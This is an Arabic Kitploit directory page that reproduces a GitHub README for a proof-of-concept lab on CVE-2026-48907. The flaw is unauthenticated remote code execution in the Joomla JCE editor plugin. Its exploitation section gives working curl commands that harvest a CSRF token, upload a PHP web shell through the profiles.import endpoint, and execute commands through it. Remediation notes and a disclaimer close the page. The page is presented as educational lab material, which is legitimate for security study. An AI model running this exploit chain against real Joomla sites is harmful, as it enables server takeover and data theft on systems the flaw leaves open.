Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48907 — POC لـ CVE-2026-48907 | Kitploit
أدوات/GitHubGitHub/pssec-io/cve-2026-48907
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

POC لـ CVE-2026-48907

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-48907 — مختبر RCE بدون مصادقة في Joomla JCE

PSsec مختبر أبحاث أمنية تعليمي لثغرة CVE-2026-48907.


نظرة عامة

CVE-2026-48907 هي ثغرة حرجة (بدرجة CVSS 10.0) في تنفيذ الأكواد عن بُعد بدون مصادقة في JCE (محرر محتوى Joomla)، وهي إضافة المحرر الأكثر تثبيتًا لـ Joomla، وتؤثر على جميع الإصدارات ≤ 2.9.99.4.

تقبل نقطة النهاية profiles.import رفع الملفات بدون أي مصادقة. يمكن للمهاجم رفع ملف PHP خبيث مُقنّع كملف تعريف XML، والذي يُكتب في دليل tmp/ على الخادم ويُتنفَّذ مباشرة عبر HTTP — بدون الحاجة إلى أي بيانات اعتماد.

التفاصيلالقيمة
CVECVE-2026-48907
درجة CVSS10.0 حرجة
الإصدارات المتأثرةJCE ≤ 2.9.99.4
الإصدارات المُصححةJCE ≥ 2.9.99.5
مدرج في CISA KEVنعم — 16 يونيو 2026
يُستغل بنشاطنعم

إعداد المختبر

المتطلبات الأساسية

  • Docker + Docker Compose
  • Kali Linux (أو أي مضيف Linux)

1. تشغيل البيئة القابلة للاستغلال

root@kitploit:~
docker compose up -d

2. إكمال مثبّت Joomla

افتح http://localhost:8080 في متصفحك وأكمل معالج الإعداد باستخدام بيانات الاعتماد التالية:

الحقلالقيمة
مضيف قاعدة البياناتdb
اسم قاعدة البياناتjoomla
مستخدم قاعدة البياناتjoomla

3. تثبيت إضافة JCE القابلة للاستغلال

root@kitploit:~
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

ثم في لوحة إدارة Joomla ← النظام ← الإضافات ← التثبيت ← ارفع ملف ZIP.


الاستغلال

4. استخراج رمز CSRF وملف تعريف الارتباط للجلسة

root@kitploit:~
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. رفع قشرة ويب PHP عبر استيراد ملف تعريف بدون مصادقة

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. التحقق من تنفيذ الأكواد عن بُعد

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

الإخراج المتوقع: uid=33(www-data) gid=33(www-data)


الملفات

الملفالوصف
docker-compose.ymlيُشغّل بيئة Joomla 5.3.1 + MySQL 8.0 القابلة للاستغلال
shell.xml.phpحمولة قشرة ويب PHP بسيطة
instructions.txtملاحظات الاستغلال خطوة بخطوة

المعالجة

قم بتحديث JCE إلى الإصدار 2.9.99.5 أو أحدث فورًا.

إشعار البائع الرسمي والتصحيح المجاني لإصدارات Joomla الأقدم: تحديث أمني لـ JCE — joomlacontenteditor.net


الإشادات

  • مرجع أدوات الاستغلال: JoomlaSniper من ynsmroztas
  • تم اكتشاف الثغرة في البرية بواسطة Phil Taylor من mySites.guru
  • إدراج CISA KEV: 16 يونيو 2026

إخلاء المسؤولية

هذا المستودع مخصص حصريًا للأغراض التعليمية وأبحاث الأمن المصرح بها.

يجب إجراء الاختبارات فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به لهذه المواد ضد أنظمة لا تملكها غير قانوني وغير أخلاقي. لا يتحمل المؤلفون وPansophical OU أي مسؤولية عن إساءة استخدام هذا المحتوى.

هذه البيئة المعملية قابلة للاستغلال عمدًا. لا تعرّضها للإنترنت أو لأي شبكة غير موثوقة.


بواسطة PSsec

تنزيل الأداة
كلمة مرور قاعدة البياناتjoomlapass